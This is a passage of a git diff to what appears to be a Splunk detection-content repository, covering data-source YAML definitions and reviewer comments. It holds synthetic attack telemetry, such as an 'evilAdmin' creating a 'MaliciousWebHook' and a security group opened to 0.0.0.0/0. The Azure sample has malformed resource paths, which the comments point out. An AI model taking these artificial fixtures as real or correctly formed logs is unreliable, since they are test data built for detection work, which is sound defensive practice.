+ url: https://splunkbase.splunk.com/app/3110
+ version: 5.2.2
+fields:
+- _time
+- authorization.action
+- authorization.scope
+- caller
+- channels
+- claims.aio
+- claims.altsecid
+- claims.appid
+- claims.appidacr
+- claims.aud
+- claims.exp
+- claims.groups
+- claims.http://schemas.microsoft.com/claims/authnclassreference
+- claims.http://schemas.microsoft.com/claims/authnmethodsreferences
+- claims.http://schemas.microsoft.com/identity/claims/identityprovider
+- claims.http://schemas.microsoft.com/identity/claims/objectidentifier
+- claims.http://schemas.microsoft.com/identity/claims/scope
+- claims.http://schemas.microsoft.com/identity/claims/tenantid
+- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress
+- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/givenname
+- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
+- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
+- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/surname
+- claims.iat
+- claims.ipaddr
+- claims.iss
+- claims.name
+- claims.nbf
+- claims.puid
+- claims.rh
+- claims.uti
+- claims.ver
+- claims.wids
+- claims.xms_tcdt
+- correlationId
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- eventDataId
+- eventName.localizedValue
+- eventName.value
+- eventSource.localizedValue
+- eventSource.value
+- eventTimestamp
+- host
+- httpRequest.clientIpAddress
+- httpRequest.clientRequestId
+- httpRequest.method
+- id
+- index
+- level
+- linecount
+- object
+- object_id
+- object_path
+- operationId
+- operationName.localizedValue
+- operationName.value
+- product
+- properties.entity
+- properties.eventCategory
+- properties.hierarchy
+- properties.message
+- properties.serviceRequestId
+- properties.statusCode
+- punct
+- resourceGroupName
+- resourceProviderName.localizedValue
+- resourceProviderName.value
+- resourceUri
+- result
+- result_id
+- source
+- sourcetype
+- splunk_server
+- src
+- status
+- status.localizedValue
+- status.value
+- subStatus.localizedValue
+- subStatus.value
+- submissionTimestamp
+- subscriptionId
+- timeendpos
+- timestartpos
+- user
+- user_name
+- vendor
+- vendor_product
+- vendor_res_code
+example_log: '{"authorization": {"action": "Microsoft.Automation/automationAccounts/webhooks/write",
+ "scope": "/subscriptions/e0c00901-96b2-4151-80f7-746e24c03e98/resourceGroups/resourceGroup1providers/Microsoft.Automation/automationAccounts/SuspiciousAutomationAccount/webhooks/MaliciousWebHook"},
+ "caller": "evilAdmin@contoso.com", "channels": "Operation", "claims": {"aud": "https://management.core.windows.net/",
+ "iss": "https://sts.windows.net/ad251139-d600-4f45-a8ba-9f6ca1e5a93d/", "iat": "1661287859",
+ "nbf": "1661287859", "exp": "1661293423", "http://schemas.microsoft.com/claims/authnclassreference":
+ "1", "aio": "AWQAm/8TAAAAEendcgWjYQFuDhNNhoecwU3dpXjjenSsIvjamk77+TjLK/o1xkFGcFb1A+OVyuY+xefe0X39n8lx1iFWFqGo0GSNNKhm9OQcv/0UyXiaNIbKD7wisgQhAa9DoIyObMpO",
+ "altsecid": "1:contoso.com:000161008492EF5F", "http://schemas.microsoft.com/claims/authnmethodsreferences":
+ "pwd,mfa", "appid": "c44b4083-3bb0-49c1-b47d-974e53cbdf3c", "appidacr": "2", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress":
+ "evilAdmin@contosol.com", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/surname":
+ "Doe", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/givenname": "John",
+ "groups": "ecb1fc87-1938-45ff-aaf3-661cee183b11", "http://schemas.microsoft.com/identity/claims/identityprovider":
+ "contoso.com", "ipaddr": "190.0.0.1", "name": "John Doe", "http://schemas.microsoft.com/identity/claims/objectidentifier":
+ "74b87c49-c202-4101-a8aa-ef18ecc815e8", "puid": "1003200203ECE231", "rh": "0.AX0AORElrQDWRU-oup9soeWpPUZIf3kAutdPukPawfj2MBOaAIM.",
+ "http://schemas.microsoft.com/identity/claims/scope": "user_impersonation", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier":
+ "VVjyH6MJP7pqXTBGCn4NMckGNjX-aYB_Oh7LcI9kaDw", "http://schemas.microsoft.com/identity/claims/tenantid":
+ "ad251139-d600-4f45-a8ba-9f6ca1e5a93d", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name":
+ "contoso.com#evilAdmin@contoso.com", "uti": "epgtY-85CUeb6aJpaE0KAQ", "ver": "1.0",
+ "wids": "62e90394-69f5-4237-9190-012177145e10", "xms_tcdt": "1654791641"}, "correlationId":
+ "74e18a58-ee2e-40de-890d-de0c155f7086", "description": "", "eventDataId": "35b9db88-8041-413e-8dd7-f8dc243eafdd",
+ "eventName": {"value": "EndRequest", "localizedValue": "End request"}, "eventSource":
+ {"value": "Administrative", "localizedValue": "Administrative"}, "httpRequest":
+ {"clientRequestId": "6934b40a-c11f-4379-9ef1-c6fa3cee5015", "clientIpAddress": "190.0.0.1",
+ "method": "PUT"}, "id": "/subscriptions/e0c00901-96b2-4151-80f7-746e24c03e98/resourceGroups/resourceGroup1providers/Microsoft.Automation/automationAccounts/SuspiciousAutomationAccount/webhooks/MaliciousWebHook/events/35b9db88-8041-413e-8dd7-f8dc243eafdd/ticks/637968850422707386",
+ "level": "Informational", "resourceGroupName": "eventhub_rg", "resourceProviderName":
+ {"value": "Microsoft.Automation", "localizedValue": "Microsoft.Automation"}, "resourceUri":
+ "/subscriptions/e0c00901-96b2-4151-80f7-746e24c03e98/resourceGroups/resourceGroup1providers/Microsoft.Automation/automationAccounts/SuspiciousAutomationAccount/webhooks/MaliciousWebHook",
+ "operationId": "74e18a58-ee2e-40de-890d-de0c155f7086", "operationName": {"value":
+ "Microsoft.Automation/automationAccounts/webhooks/write", "localizedValue": "Create
+ or Update an Azure Automation webhook"}, "properties": {"statusCode": "Created",
+ "serviceRequestId": null, "eventCategory": "Administrative", "entity": "/subscriptions/e0c00901-96b2-4151-80f7-746e24c03e98/resourceGroups/resourceGroup1providers/Microsoft.Automation/automationAccounts/SuspiciousAutomationAccount/webhooks/MaliciousWebHook",
+ "message": "Microsoft.Automation/automationAccounts/webhooks/write", "hierarchy":
+ "e0c00901-96b2-4151-80f7-746e24c03e98"}, "status": {"value": "Succeeded", "localizedValue":
+ "Succeeded"}, "subStatus": {"value": "Created", "localizedValue": "Created (HTTP
+ Status Code: 201)"}, "eventTimestamp": "2022-08-23T20:57:22.2707386Z", "submissionTimestamp":
+ "2022-08-23T20:58:54.2071536Z", "subscriptionId": "e0c00901-96b2-4151-80f7-746e24c03e98"}'
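Review bot: The sample event's resource paths are malformed: `resourceGroups/resourceGroup1providers/Microsoft.Automation/...` is missing the `/` between the resource-group and provider segments in `authorization.scope`, `id`, `resourceUri` and `properties.entity`, so a detection or test that extracts the resource group from these fields will not behave as it would on a real Activity Log event; each should read `.../resourceGroups/resourceGroup1/providers/Microsoft.Automation/...`. `resourceGroupName` is `eventhub_rg` while the paths name `resourceGroup1`, and the emailaddress claim reads `evilAdmin@contosol.com` against `evilAdmin@contoso.com` elsewhere in the same event; these look like editing artifacts and should be reconciled so the example stays a faithful sample.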
diff --git a/data_sources/network/Bro.yml b/data_sources/bro.yml
similarity index 59%
rename from data_sources/network/Bro.yml
rename to data_sources/bro.yml
index 4ef24f1358..100d017f03 100644
--- a/data_sources/network/Bro.yml
+++ b/data_sources/bro.yml
@@ -1,7 +1,10 @@
name: Bro
id: c5d9612b-0ffd-44d3-8247-3cf3486ec5e2
+version: 1
+date: '2024-07-18'
author: Patrick Bareiss, Splunk
+description: Data source object for Bro
source: bro:http:json
sourcetype: bro:http:json
-supported_TA: {}
-event_names: []
+supported_TA:
+- {}
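Review bot: `supported_TA:` followed by `- {}` parses to a list holding one empty mapping, a different shape from the other data sources in this change, where each entry carries `name`, `url` and `version` (the `azure_audit_*` files above). If no add-on is declared for this source, `supported_TA: []` states that explicitly and avoids an entry that a schema requiring those keys would presumably reject; if an add-on exists, fill in the entry instead.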
diff --git a/data_sources/cim/endpoint_filesystem.yml b/data_sources/cim/endpoint_filesystem.yml
deleted file mode 100644
index e937b90e5e..0000000000
--- a/data_sources/cim/endpoint_filesystem.yml
+++ /dev/null
@@ -1,27 +0,0 @@
-name: Endpoint.Filesystem
-prefix: Filesystem
-fields:
- - action
- - dest
- - dest_bunit
- - dest_category
- - dest_priority
- - dest_requires_av
- - dest_should_timesync
- - dest_should_update
- - file_access_time
- - file_create_time
- - file_hash
- - file_modify_time
- - file_name
- - file_path
- - file_acl
- - file_size
- - process_guid
- - process_id
- - tag
- - user
- - user_bunit
- - user_category
- - user_priority
- - vendor_product
\ No newline at end of file
diff --git a/data_sources/cim/endpoint_processes.yml b/data_sources/cim/endpoint_processes.yml
deleted file mode 100644
index 7f27e77545..0000000000
--- a/data_sources/cim/endpoint_processes.yml
+++ /dev/null
@@ -1,39 +0,0 @@
-name: Endpoint.Processes
-prefix: Processes
-fields:
- - action
- - cpu_load_percent
- - dest
- - dest_bunit
- - dest_category
- - dest_is_expected
- - dest_priority
- - dest_requires_av
- - dest_should_timesync
- - dest_should_update
- - loaded_file
- - mem_used
- - original_file_name
- - os
- - parent_process
- - parent_process_exec
- - parent_process_id
- - parent_process_guid
- - parent_process_name
- - parent_process_path
- - process
- - process_current_directory
- - process_exec
- - process_hash
- - process_guid
- - process_id
- - process_integrity_level
- - process_name
- - process_path
- - tag
- - user
- - user_id
- - user_bunit
- - user_category
- - user_priority
- - vendor_product
\ No newline at end of file
diff --git a/data_sources/cim/endpoint_registry.yml b/data_sources/cim/endpoint_registry.yml
deleted file mode 100644
index b82249d154..0000000000
--- a/data_sources/cim/endpoint_registry.yml
+++ /dev/null
@@ -1,27 +0,0 @@
-name: Endpoint.Registry
-prefix: Registry
-fields:
- - action
- - dest
- - dest_bunit
- - dest_category
- - dest_priority
- - dest_requires_av
- - dest_should_timesync
- - dest_should_update
- - process_guid
- - process_id
- - registry_hive
- - registry_path
- - registry_key_name
- - registry_value_data
- - registry_value_name
- - registry_value_text
- - registry_value_type
- - status
- - tag
- - user
- - user_bunit
- - user_category
- - user_priority
- - vendor_product
\ No newline at end of file
diff --git a/data_sources/cim/endpoint_services.yml b/data_sources/cim/endpoint_services.yml
deleted file mode 100644
index 1bcb71d6b6..0000000000
--- a/data_sources/cim/endpoint_services.yml
+++ /dev/null
@@ -1,35 +0,0 @@
-name: Endpoint.Services
-prefix: Services
-fields:
- - description
- - dest
- - dest_bunit
- - dest_category
- - dest_is_expected
- - dest_priority
- - dest_requires_av
- - dest_should_timesync
- - dest_should_update
- - process_guid
- - process_id
- - service
- - service_dll
- - service_dll_path
- - service_dll_hash
- - service_dll_signature_exists
- - service_dll_signature_verified
- - service_exec
- - service_hash
- - service_id
- - service_name
- - service_path
- - service_signature_exists
- - service_signature_verified
- - start_mode
- - status
- - tag
- - user
- - user_bunit
- - user_category
- - user_priority
- - vendor_product
\ No newline at end of file
diff --git a/data_sources/cim/network_resolution.yml b/data_sources/cim/network_resolution.yml
deleted file mode 100644
index 2b64524824..0000000000
--- a/data_sources/cim/network_resolution.yml
+++ /dev/null
@@ -1,32 +0,0 @@
-name: Network_Resolution.DNS
-prefix: DNS
-fields:
- - additional_answer_count
- - answer
- - answer_count
- - authority_answer_count
- - dest
- - dest_bunit
- - dest_category
- - dest_port
- - dest_priority
- - duration
- - message_type
- - name
- - query
- - query_count
- - query_type
- - record_type
- - reply_code
- - reply_code_id
- - response_time
- - src
- - src_bunit
- - src_category
- - src_port
- - src_priority
- - tag
- - transaction_id
- - transport
- - ttl
- - vendor_product
\ No newline at end of file
diff --git a/data_sources/cim/network_traffic.yml b/data_sources/cim/network_traffic.yml
deleted file mode 100644
index e1b040eb89..0000000000
--- a/data_sources/cim/network_traffic.yml
+++ /dev/null
@@ -1,66 +0,0 @@
-name: Network_Traffic.All_Traffic
-prefix: All_Traffic
-fields:
- - action
- - app
- - bytes
- - bytes_in
- - bytes_out
- - channel
- - dest
- - dest_bunit
- - dest_category
- - dest_interface
- - dest_ip
- - dest_mac
- - dest_port
- - dest_priority
- - dest_translated_ip
- - dest_translated_port
- - dest_zone
- - direction
- - duration
- - dvc
- - dvc_bunit
- - dvc_category
- - dvc_ip
- - dvc_mac
- - dvc_priority
- - dvc_zone
- - flow_id
- - icmp_code
- - icmp_type
- - packets
- - packets_in
- - packets_out
- - process_id
- - protocol
- - protocol_version
- - response_time
- - rule
- - session_id
- - src
- - src_bunit
- - src_category
- - src_interface
- - src_ip
- - src_mac
- - src_port
- - src_priority
- - src_translated_ip
- - src_translated_port
- - src_zone
- - ssid
- - tag
- - tcp_flag
- - transport
- - tos
- - ttl
- - user
- - user_bunit
- - user_category
- - user_priority
- - vendor_account
- - vendor_product
- - vlan
- - wifi
\ No newline at end of file
diff --git a/data_sources/cim/web.yml b/data_sources/cim/web.yml
deleted file mode 100644
index c279476e74..0000000000
--- a/data_sources/cim/web.yml
+++ /dev/null
@@ -1,41 +0,0 @@
-name: Web.Web
-prefix: Web
-fields:
- - action
- - app
- - bytes
- - bytes_in
- - bytes_out
- - cached
- - category
- - cookie
- - dest
- - dest_bunit
- - dest_category
- - dest_priority
- - dest_port
- - duration
- - http_content_type
- - http_method
- - http_referrer
- - http_referrer_domain
- - http_user_agent
- - http_user_agent_length
- - response_time
- - site
- - src
- - src_bunit
- - src_category
- - src_priority
- - status
- - tag
- - uri_path
- - uri_query
- - url
- - url_domain
- - url_length
- - user
- - user_bunit
- - user_category
- - user_priority
- - vendor_product
\ No newline at end of file
diff --git a/data_sources/cloud/CircleCI.yml b/data_sources/circleci.yml
similarity index 58%
rename from data_sources/cloud/CircleCI.yml
rename to data_sources/circleci.yml
index 73e8e6a43c..9dfcb06b20 100644
--- a/data_sources/cloud/CircleCI.yml
+++ b/data_sources/circleci.yml
@@ -1,68 +1,69 @@
name: CircleCI
id: 34ad06fc-a296-4ab5-8315-2f07714948e3
+version: 1
+date: '2024-07-18'
author: Patrick Bareiss, Splunk
+description: Data source object for CircleCI
source: circleci
sourcetype: circleci
supported_TA:
- name: App for CircleCI
- version: 0.1.1
+- name: App for CircleCI
url: https://splunkbase.splunk.com/app/5162
-event_names: []
+ version: 0.1.1
fields:
- - _time
- - author_name
- - avatar_url
- - branch
- - build_num
- - build_time_millis
- - build_url
- - date_hour
- - date_mday
- - date_minute
- - date_month
- - date_second
- - date_wday
- - date_year
- - date_zone
- - eventtype
- - fail_reason
- - host
- - index
- - job_name
- - job_time
- - linecount
- - owners{}
- - project_slug
- - punct
- - queued_time
- - reponame
- - source
- - sourcetype
- - splunk_server
- - start_time
- - status
- - stop_time
- - tag
- - tag::eventtype
- - timedout
- - timeendpos
- - timestartpos
- - username
- - vcs.commit_time
- - vcs.committer_name
- - vcs.revision
- - vcs.subject
- - vcs.tag
- - vcs.type
- - vcs.url
- - workflows.job_id
- - workflows.job_name
- - workflows.upstream_job_ids{}
- - workflows.workflow_id
- - workflows.workflow_name
- - workflows.workspace_id
-example_log:
- '{"job_time": "2021-09-02T08:13:34.273Z", "stop_time": "2021-09-02T08:13:34.273Z",
+- _time
+- author_name
+- avatar_url
+- branch
+- build_num
+- build_time_millis
+- build_url
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- eventtype
+- fail_reason
+- host
+- index
+- job_name
+- job_time
+- linecount
+- owners{}
+- project_slug
+- punct
+- queued_time
+- reponame
+- source
+- sourcetype
+- splunk_server
+- start_time
+- status
+- stop_time
+- tag
+- tag::eventtype
+- timedout
+- timeendpos
+- timestartpos
+- username
+- vcs.commit_time
+- vcs.committer_name
+- vcs.revision
+- vcs.subject
+- vcs.tag
+- vcs.type
+- vcs.url
+- workflows.job_id
+- workflows.job_name
+- workflows.upstream_job_ids{}
+- workflows.workflow_id
+- workflows.workflow_name
+- workflows.workspace_id
+example_log: '{"job_time": "2021-09-02T08:13:34.273Z", "stop_time": "2021-09-02T08:13:34.273Z",
"start_time": "2021-09-02T08:10:15.829Z", "queued_time": "2021-09-02T08:10:12.764Z",
"job_name": "Unknown", "reponame": "devsecops_poc", "build_num": 94, "build_url":
"https://circleci.com/gh/splunk/devsecops_poc/94", "branch": "main", "status": "success",
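Review bot: Most of this hunk is a reindent of the `fields` sequence from indented to flush style plus the join of `example_log` onto its key line; only `version`, `date` and `description` are new content. Mixing the reformat with the content change hides the substantive additions in review — if the reindent is formatter output, landing it as a separate commit would keep them visible. The entry under `supported_TA` also reorders its keys to `name`, `url`, `version`, which matches the `azure_audit_*` sources added in this change.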
diff --git a/data_sources/cloud/AWS_CloudTrail.yml b/data_sources/cloud/AWS_CloudTrail.yml
deleted file mode 100644
index 2cac0ef0af..0000000000
--- a/data_sources/cloud/AWS_CloudTrail.yml
+++ /dev/null
@@ -1,229 +0,0 @@
-name: AWS CloudTrail
-id: aa8d90bf-8ab1-4a9f-8c1b-24a67b1cd0b0
-author: Patrick Bareiss, Splunk
-source: aws_cloudtrail
-sourcetype: aws:cloudtrail
-separator: eventName
-supported_TA:
- name: Splunk Add-on for Amazon Web Services (AWS)
- version: 7.4.1
- url: https://splunkbase.splunk.com/app/1876
-event_names:
-- event_name: AWS CloudTrail
- data_source: data_sources/cloud/event_sources/AWS_CloudTrail.yml
-- event_name: AWS CloudTrail AssumeRoleWithSAML
- data_source: data_sources/cloud/event_sources/AWS_CloudTrail_AssumeRoleWithSAML.yml
-- event_name: AWS CloudTrail ConsoleLogin
- data_source: data_sources/cloud/event_sources/AWS_CloudTrail_ConsoleLogin.yml
-- event_name: AWS CloudTrail CopyObject
- data_source: data_sources/cloud/event_sources/AWS_CloudTrail_CopyObject.yml
-- event_name: AWS CloudTrail CreateAccessKey
- data_source: data_sources/cloud/event_sources/AWS_CloudTrail_CreateAccessKey.yml
-- event_name: AWS CloudTrail CreateKey
- data_source: data_sources/cloud/event_sources/AWS_CloudTrail_CreateKey.yml
-- event_name: AWS CloudTrail CreateLoginProfile
- data_source: data_sources/cloud/event_sources/AWS_CloudTrail_CreateLoginProfile.yml
-- event_name: AWS CloudTrail CreateNetworkAclEntry
- data_source: data_sources/cloud/event_sources/AWS_CloudTrail_CreateNetworkAclEntry.yml
-- event_name: AWS CloudTrail CreatePolicyVersion
- data_source: data_sources/cloud/event_sources/AWS_CloudTrail_CreatePolicyVersion.yml
-- event_name: AWS CloudTrail CreateSnapshot
- data_source: data_sources/cloud/event_sources/AWS_CloudTrail_CreateSnapshot.yml
-- event_name: AWS CloudTrail CreateTask
- data_source: data_sources/cloud/event_sources/AWS_CloudTrail_CreateTask.yml
-- event_name: AWS CloudTrail CreateVirtualMFADevice
- data_source: data_sources/cloud/event_sources/AWS_CloudTrail_CreateVirtualMFADevice.yml
-- event_name: AWS CloudTrail DeactivateMFADevice
- data_source: data_sources/cloud/event_sources/AWS_CloudTrail_DeactivateMFADevice.yml
-- event_name: AWS CloudTrail DeleteAccountPasswordPolicy
- data_source: data_sources/cloud/event_sources/AWS_CloudTrail_DeleteAccountPasswordPolicy.yml
-- event_name: AWS CloudTrail DeleteAlarms
- data_source: data_sources/cloud/event_sources/AWS_CloudTrail_DeleteAlarms.yml
-- event_name: AWS CloudTrail DeleteDetector
- data_source: data_sources/cloud/event_sources/AWS_CloudTrail_DeleteDetector.yml
-- event_name: AWS CloudTrail DeleteGroup
- data_source: data_sources/cloud/event_sources/AWS_CloudTrail_DeleteGroup.yml
-- event_name: AWS CloudTrail DeleteIPSet
- data_source: data_sources/cloud/event_sources/AWS_CloudTrail_DeleteIPSet.yml
-- event_name: AWS CloudTrail DeleteLogGroup
- data_source: data_sources/cloud/event_sources/AWS_CloudTrail_DeleteLogGroup.yml
-- event_name: AWS CloudTrail DeleteLogStream
- data_source: data_sources/cloud/event_sources/AWS_CloudTrail_DeleteLogStream.yml
-- event_name: AWS CloudTrail DeleteLoggingConfiguration
- data_source: data_sources/cloud/event_sources/AWS_CloudTrail_DeleteLoggingConfiguration.yml
-- event_name: AWS CloudTrail DeleteNetworkAclEntry
- data_source: data_sources/cloud/event_sources/AWS_CloudTrail_DeleteNetworkAclEntry.yml
-- event_name: AWS CloudTrail DeletePolicy
- data_source: data_sources/cloud/event_sources/AWS_CloudTrail_DeletePolicy.yml
-- event_name: AWS CloudTrail DeleteRule
- data_source: data_sources/cloud/event_sources/AWS_CloudTrail_DeleteRule.yml
-- event_name: AWS CloudTrail DeleteRuleGroup
- data_source: data_sources/cloud/event_sources/AWS_CloudTrail_DeleteRuleGroup.yml
-- event_name: AWS CloudTrail DeleteSnapshot
- data_source: data_sources/cloud/event_sources/AWS_CloudTrail_DeleteSnapshot.yml
-- event_name: AWS CloudTrail DeleteTrail
- data_source: data_sources/cloud/event_sources/AWS_CloudTrail_DeleteTrail.yml
-- event_name: AWS CloudTrail DeleteVirtualMFADevice
- data_source: data_sources/cloud/event_sources/AWS_CloudTrail_DeleteVirtualMFADevice.yml
-- event_name: AWS CloudTrail DeleteWebACL
- data_source: data_sources/cloud/event_sources/AWS_CloudTrail_DeleteWebACL.yml
-- event_name: AWS CloudTrail DescribeEventAggregates
- data_source: data_sources/cloud/event_sources/AWS_CloudTrail_DescribeEventAggregates.yml
-- event_name: AWS CloudTrail DescribeImageScanFindings
- data_source: data_sources/cloud/event_sources/AWS_CloudTrail_DescribeImageScanFindings.yml
-- event_name: AWS CloudTrail DescribeSnapshotAttribute
- data_source: data_sources/cloud/event_sources/AWS_CloudTrail_DescribeSnapshotAttribute.yml
-- event_name: AWS CloudTrail GetAccountPasswordPolicy
- data_source: data_sources/cloud/event_sources/AWS_CloudTrail_GetAccountPasswordPolicy.yml
-- event_name: AWS CloudTrail GetObject
- data_source: data_sources/cloud/event_sources/AWS_CloudTrail_GetObject.yml
-- event_name: AWS CloudTrail GetPasswordData
- data_source: data_sources/cloud/event_sources/AWS_CloudTrail_GetPasswordData.yml
-- event_name: AWS CloudTrail JobCreated
- data_source: data_sources/cloud/event_sources/AWS_CloudTrail_JobCreated.yml
-- event_name: AWS CloudTrail ModifyDBInstance
- data_source: data_sources/cloud/event_sources/AWS_CloudTrail_ModifyDBInstance.yml
-- event_name: AWS CloudTrail ModifyImageAttribute
- data_source: data_sources/cloud/event_sources/AWS_CloudTrail_ModifyImageAttribute.yml
-- event_name: AWS CloudTrail ModifySnapshotAttribute
- data_source: data_sources/cloud/event_sources/AWS_CloudTrail_ModifySnapshotAttribute.yml
-- event_name: AWS CloudTrail PutBucketAcl
- data_source: data_sources/cloud/event_sources/AWS_CloudTrail_PutBucketAcl.yml
-- event_name: AWS CloudTrail PutBucketLifecycle
- data_source: data_sources/cloud/event_sources/AWS_CloudTrail_PutBucketLifecycle.yml
-- event_name: AWS CloudTrail PutBucketReplication
- data_source: data_sources/cloud/event_sources/AWS_CloudTrail_PutBucketReplication.yml
-- event_name: AWS CloudTrail PutBucketVersioning
- data_source: data_sources/cloud/event_sources/AWS_CloudTrail_PutBucketVersioning.yml
-- event_name: AWS CloudTrail PutImage
- data_source: data_sources/cloud/event_sources/AWS_CloudTrail_PutImage.yml
-- event_name: AWS CloudTrail PutKeyPolicy
- data_source: data_sources/cloud/event_sources/AWS_CloudTrail_PutKeyPolicy.yml
-- event_name: AWS CloudTrail ReplaceNetworkAclEntry
- data_source: data_sources/cloud/event_sources/AWS_CloudTrail_ReplaceNetworkAclEntry.yml
-- event_name: AWS CloudTrail SetDefaultPolicyVersion
- data_source: data_sources/cloud/event_sources/AWS_CloudTrail_SetDefaultPolicyVersion.yml
-- event_name: AWS CloudTrail StopLogging
- data_source: data_sources/cloud/event_sources/AWS_CloudTrail_StopLogging.yml
-- event_name: AWS CloudTrail UpdateAccountPasswordPolicy
- data_source: data_sources/cloud/event_sources/AWS_CloudTrail_UpdateAccountPasswordPolicy.yml
-- event_name: AWS CloudTrail UpdateLoginProfile
- data_source: data_sources/cloud/event_sources/AWS_CloudTrail_UpdateLoginProfile.yml
-- event_name: AWS CloudTrail UpdateSAMLProvider
- data_source: data_sources/cloud/event_sources/AWS_CloudTrail_UpdateSAMLProvider.yml
-- event_name: AWS CloudTrail UpdateTrail
- data_source: data_sources/cloud/event_sources/AWS_CloudTrail_UpdateTrail.yml
-fields:
-- _time
-- action
-- app
-- awsRegion
-- aws_account_id
-- change_type
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- direction
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object
-- object_category
-- object_id
-- product
-- protocol
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.groupId
-- requestParameters.ipPermissions.items{}.fromPort
-- requestParameters.ipPermissions.items{}.ipProtocol
-- requestParameters.ipPermissions.items{}.ipRanges.items{}.cidrIp
-- requestParameters.ipPermissions.items{}.toPort
-- responseElements._return
-- responseElements.requestId
-- responseElements.securityGroupRuleSet.items{}.cidrIpv4
-- responseElements.securityGroupRuleSet.items{}.fromPort
-- responseElements.securityGroupRuleSet.items{}.groupId
-- responseElements.securityGroupRuleSet.items{}.groupOwnerId
-- responseElements.securityGroupRuleSet.items{}.ipProtocol
-- responseElements.securityGroupRuleSet.items{}.isEgress
-- responseElements.securityGroupRuleSet.items{}.securityGroupRuleId
-- responseElements.securityGroupRuleSet.items{}.toPort
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- src_ip_range
-- src_port_range
-- start_time
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- tlsDetails.cipherSuite
-- tlsDetails.clientProvidedHostHeader
-- tlsDetails.tlsVersion
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.type
-- userIdentity.userName
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.09", "userIdentity": {"type": "IAMUser", "principalId":
- "AIDAAAAAAAAAAAAAAAAAA", "arn": "arn:aws:iam::111111111111:user/daftpunk_cli", "accountId":
- "111111111111", "accessKeyId": "AKIAAAAAAAAAAAAAAAAA", "userName": "daftpunk_cli"},
- "eventTime": "2024-02-21T19:19:40Z", "eventSource": "ec2.amazonaws.com", "eventName":
- "AuthorizeSecurityGroupIngress", "awsRegion": "us-west-2", "sourceIPAddress": "2.2.2.2",
- "userAgent": "aws-cli/2.13.22 Python/3.11.5 Darwin/22.5.0 source/arm64 prompt/off
- command/ec2.authorize-security-group-ingress", "requestParameters": {"groupId":
- "sg-07ffb1896dcd3713e", "ipPermissions": {"items": [{"ipProtocol": "-1", "fromPort":
- -1, "toPort": -1, "groups": {}, "ipRanges": {"items": [{"cidrIp": "0.0.0.0/0"}]},
- "ipv6Ranges": {}, "prefixListIds": {}}]}}, "responseElements": {"requestId": "4950930b-2129-423c-95b0-1b87c8fa115a",
- "_return": true, "securityGroupRuleSet": {"items": [{"groupOwnerId": "111111111111",
- "groupId": "sg-07ffb1896dcd3713e", "securityGroupRuleId": "sgr-0217c1b508cc6b76c",
- "isEgress": false, "ipProtocol": "-1", "fromPort": -1, "toPort": -1, "cidrIpv4":
- "0.0.0.0/0"}]}}, "requestID": "4950930b-2129-423c-95b0-1b87c8fa115a", "eventID":
- "bdade96f-6272-468a-b084-413b9711e92f", "readOnly": false, "eventType": "AwsApiCall",
- "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory":
- "Management", "tlsDetails": {"tlsVersion": "TLSv1.3", "cipherSuite": "TLS_AES_128_GCM_SHA256",
- "clientProvidedHostHeader": "ec2.us-west-2.amazonaws.com"}}'
diff --git a/data_sources/cloud/AWS_CloudWatchLogs_VPCflow.yml b/data_sources/cloud/AWS_CloudWatchLogs_VPCflow.yml
deleted file mode 100644
index 7ba4fc7362..0000000000
--- a/data_sources/cloud/AWS_CloudWatchLogs_VPCflow.yml
+++ /dev/null
@@ -1,66 +0,0 @@
-name: AWS CloudWatchLogs VPCflow
-id: 38a34fc4-e128-4478-a8f4-7835d51d5135
-author: Bhavin Patel, Splunk
-source: aws_cloudwatchlogs_vpcflow
-sourcetype: aws:cloudwatchlogs:vpcflow
-separator: eventName
-supported_TA:
- name: Splunk Add-on for Amazon Web Services (AWS)
- version: 7.4.1
- url: https://splunkbase.splunk.com/app/1876
-event_names: []
-fields:
-- _raw
-- _time
-- account_id
-- action
-- app
-- aws_account_id
-- bytes
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_ip
-- dest_port
-- duration
-- dvc
-- end_time
-- eventtype
-- host
-- index
-- interface_id
-- linecount
-- log_status
-- packets
-- protocol
-- protocol_code
-- protocol_full_name
-- protocol_version
-- punct
-- region
-- source
-- sourcetype
-- splunk_server
-- splunk_server_group
-- src
-- src_ip
-- src_port
-- start_time
-- tag
-- tag::action
-- tag::eventtype
-- timeendpos
-- timestartpos
-- transport
-- user_id
-- vendor_account
-- vendor_product
-- version
-- vpcflow_action
-example_log: '2 123397614277 eni-0b0f9f261f45e6489 10.0.1.30 10.0.1.1 47254 22 17 2 98 1697608042 1697608070 ACCEPT OK'
diff --git a/data_sources/cloud/Azure_Active_Directory.yml b/data_sources/cloud/Azure_Active_Directory.yml
deleted file mode 100644
index e31309c44a..0000000000
--- a/data_sources/cloud/Azure_Active_Directory.yml
+++ /dev/null
@@ -1,180 +0,0 @@
-name: Azure Active Directory
